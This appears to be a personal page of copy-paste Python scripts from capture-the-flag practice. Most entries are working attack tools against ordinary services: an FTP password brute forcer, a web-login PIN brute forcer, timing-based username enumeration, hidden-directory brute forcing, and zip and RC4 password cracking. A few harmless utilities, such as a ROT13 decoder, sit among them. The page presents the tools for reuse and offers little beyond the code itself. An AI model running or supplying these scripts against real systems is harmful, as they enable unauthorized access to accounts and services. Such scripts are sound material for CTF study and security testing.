Examples and Quick Scripts

Search…
This is a page of quick wins and scripts written to achieve certain goals. Copy/paste parts as needed!
Python
FTP Brute Force
Brute forces all passwords from words.txt for the username secure_usertry/except loop.
1
from ftplib import FTP
2
import time
3
​
4
ftp = FTP()
5
HOST = 'services.ftp.site'
6
PORT = 2121
7
ftp.set_debuglevel(2)
8
​
9
​
10
dictionary = 'words.txt'
11
password = None
12
​
13
with open(dictionary, 'r') as f:
14
  for line in f.readlines():
15
    password = line.strip('\n')
16
    print('trying ' + password)
17
    time.sleep(0.001)
18
    try:
19
      ftp.connect(HOST, PORT)
20
      ftp.login(user='secure_user', passwd=password)
21
      ftp.quit()
22
    except:
23
      pass
24
print(password)
Copied!
RC4 Brute Force
ARC4 brute forcing script written to try and decrypt a string. The decryption attempt is passed to another loop to try and determine if the string is readable ASCII or not. I chose not to pause or quit the loop because I was getting some false positives.
1
from arc4 import ARC4
2
​
3
cipher = b'\x55\x34\xe1\xb2\x17\xdc\x2a\xc5\x21\x26\x77\xe3\xae\x56\xed\x42\xc3\x28\x10\x40\x0a\xfc\xa2\x1d\xef\xab\x11\x1b\xc7'
4
​
5
with open("big_set.txt", "r") as keys:
6
        for line in keys:
7
                line = line.strip()
8
                arc4 = ARC4(bytes(line, 'utf-8'))
9
                new = arc4.decrypt(cipher)
10
                try:
11
                        decoder = bytes.fromhex(new.hex()).decode('utf-8')
12
                        print("Key " + line + " made this:\n" + decoder)
13
                except UnicodeDecodeError:
14
                        pass
Copied!
Zip File Brute Force Guess with B64 Password
This script will attempt to unzip an archive with a password from rockyou. This particular challenge said the password was base64 encoded, which is what the first part of the loop is for. Second part of loop is a try/except loop to pass the unzip error with wrong password. 
Alternatively, one could get the zip hash then convert the rockyou list into base64 for each line - I chose to NOT do this to prevent having an extra rockyou file full of base64.
1
import base64
2
import zipfile
3
​
4
dictionary = '/mnt/d/hashcat-6.0.0/rockyou.txt'
5
​
6
with open(dictionary, 'r', errors='ignore') as f:
7
    for line in f.readlines():
8
        password = line.strip('\n')
9
        #print(f'Raw password is {password}')
10
        encoded = base64.b64encode(str.encode(password))
11
        #print(f'Encoded password is {encoded}')
12
​
13
        with zipfile.ZipFile('./base64.zip','r') as zip_ref:
14
            try:
15
                zip_ref.extractall(pwd=encoded)
16
                print(f'Found! Password is {password}, encoded is {encoded}!')
17
                quit()
18
            except:
19
                pass
Copied!
Connect to a Website, Establish Session, and Send Data
Establishing a session prevents multiple TCP connections from having to be opened. Additionally, taking the JSON and interpreting natively makes things useful!
1
import requests
2
import json
3
url = 'https://captcha.lol'
4
​
5
header = {'User-Agent':'bot'}
6
s = requests.Session()
7
r = s.get(url,headers=header)
8
​
9
ans = json.loads(r.text)
10
​
11
code = ans['code']
12
nonce = ans['nonce']
13
print(code)
14
print(nonce)
15
p = s.post(url, json=ans, headers=header)
16
​
17
print(p.text)
Copied!
PIN Brute Force for Web Login
This script adds a pin guess for a web login attempt. The pin is zfilled which makes 4 to 004. Additionally there’s a regular expression to find if access was denied or not and give what the PIN was while breaking out of the loop. A final print statement lets me know that they were all looped through, useful when I wasn't sure if my requests were properly formatted.
1
import urllib
2
import requests
3
import re
4
​
5
url = "https://vuln.server/admin_login"
6
​
7
pin = 0
8
​
9
while pin < 1000:
10
    #headers = {'Cookie' : 'PHPSESSID=qhq84atma883hio9eso7hhsr4j'}
11
    payload = {'email':'[email protected]','password':str(pin).zfill(3)}
12
    req = requests.post(url, data=payload, allow_redirects=True)
13
    if not re.findall('Access Denied', req.text):
14
        print(f'\npin is {str(pin).zfill(3)}!\n')
15
        break
16
    print(str(pin).zfill(3), req.status_code, len(req.content))
17
    pin = pin + 1
18
​
19
print('finished testing')
Copied!
Username Guessing based on Timing Analysis
This script pays attention to the timing between good usernames and bad ones to help determine if a username is valid.
1
import requests
2
from string import ascii_lowercase
3
with open('surnames.txt') as f:
4
    lines = f.read().splitlines()
5
for lname in lines:
6
    for init in ascii_lowercase:
7
        username = init+lname
8
        r = requests.post('http://m4lwhere.org/login.php', data = {'user':username,'pass':'haha'})
9
        roundtrip = r.elapsed.total_seconds()
10
        print(f'{roundtrip} for {username}')
Copied!
Connect to Raw Socket and Pass Data
This challenge required connecting to the socket and brute forcing the first byte back, I didn’t fully finish this challenge because it was a little frustrating. I need to spend more time on this script.
1
import socket                                                       
2
                                                                    
3
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)               
4
s.connect(('cfta-ne01.allyourbases.co',8017))                       
5
buf = s.recv(1024)                                                  
6
s.recv(1024)                                                        
7
conv = buf.decode('unicode-escape').encode('latin1').decode('UTF-8')
8
conv = conv + '\n'                                                  
9
print(conv)                                                         
10
s.sendall(bytes(conv, encoding='UTF-8'))                            
11
ans = s.recv(1024)                                                  
12
win = ans.decode('unicode-escape').encode('latin1').decode('UTF-8') 
13
print(win)                                                          
14
s.close() 
Copied!
1
import socket
2
import time
3
​
4
def connect():
5
    s.connect(('challenges.ctf.lol',3008))
6
​
7
def recv():
8
    recv = s.recv(1024)
9
    print(recv)
10
​
11
for i in range(ord('A'),ord('z')+1):
12
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
13
    print(f'trying {chr(i)}')
14
    s.connect(('challenges.ctf.lol',30468))
15
    recv = s.recv(1024)
16
    print(recv)
17
    s.sendall(bytes(chr(i), encoding='utf8'))
18
    recv = s.recv(1024)
19
    print(recv)
20
    s.close()
Copied!
ROT13 Automatic Decoder
Written by Jess! Automatically finds the decoded input using the enchant library. Searches for legitimate words in the English dictionary, very cool!
1
import enchant
2
d = enchant.Dict("en_US")
3
​
4
cipher=input("Enter Caesar Shift Cipher to Decode: ")
5
for n in range(26):
6
    decode=""
7
    wordfound=""
8
    for x in range(0,len(cipher)):
9
        if ord(cipher[x]) in range(97,123):
10
            decode+=(chr(((ord(cipher[x])-96+n)%26)+97))
11
        elif ord(cipher[x]) in range(65,91):
12
            decode+=(chr(((ord(cipher[x])-64+n)%26)+65))
13
        elif ord(cipher[x])==(32):
14
            checkword=d.check(decode)
15
            if checkword:
16
                wordfound=("Found!")
17
            decode+=cipher[x]
18
        else:
19
            decode+=cipher[x]
20
    check=d.check(decode)
21
    print((n+1),decode,wordfound)
Copied!
Choose Random Numbers
This program chooses some random integers and assigns them to a string. Nothing fancy.
1
import random
2
​
3
series = random.randint(1,3)
4
​
5
book = random.randint(1,6)
6
​
7
page = random.randint(1,300)
8
​
9
print(f'Series {series}, Book {book}, Page {page}\n\n')
Copied!
List of all Characters from aa to zz :
Quick way to create a list of all possible lowercase values
1
from string import ascii_lowercase
2
for a in ascii_lowercase:
3
    for b in ascii_lowercase:
4
        print(a+b)
Copied!
Below is brute forcing all lowercase characters to find a hidden web dir
1
import requests
2
from string import ascii_lowercase
3
​
4
url = 'http://m4lwhere.org/'
5
​
6
for a in ascii_lowercase:
7
    for b in ascii_lowercase:
8
        for c in ascii_lowercase:
9
            #print(a+b+c)
10
            fullUrl = url + a + b + c
11
            r = requests.get(fullUrl)
12
            if r.status_code != 404:
13
                print(f'Code {r.status_code} for {fullUrl}')
14
            else:
15
                pass
Copied!
Same one, just with a progress bar!
1
import requests
2
from progress.bar import Bar
3
from string import ascii_lowercase
4
​
5
url = 'http://m4lwhere.org/'
6
​
7
with Bar('Brute Forcing...', max=26*26*26-1) as bar:
8
    for a in ascii_lowercase:
9
        for b in ascii_lowercase:
10
            for c in ascii_lowercase:
11
                #print(a+b+c)
12
                fullUrl = url + a + b + c
13
                r = requests.get(fullUrl)
14
                if r.status_code != 404:
15
                    print(f'\nCode {r.status_code} for {fullUrl}')
16
                else:
17
                    bar.next()
18
                    pass
Copied!
Programming - Previous
Programming Notes
Next - Programming
Pwn
Last modified 5mo ago
Copy link
Contents
Python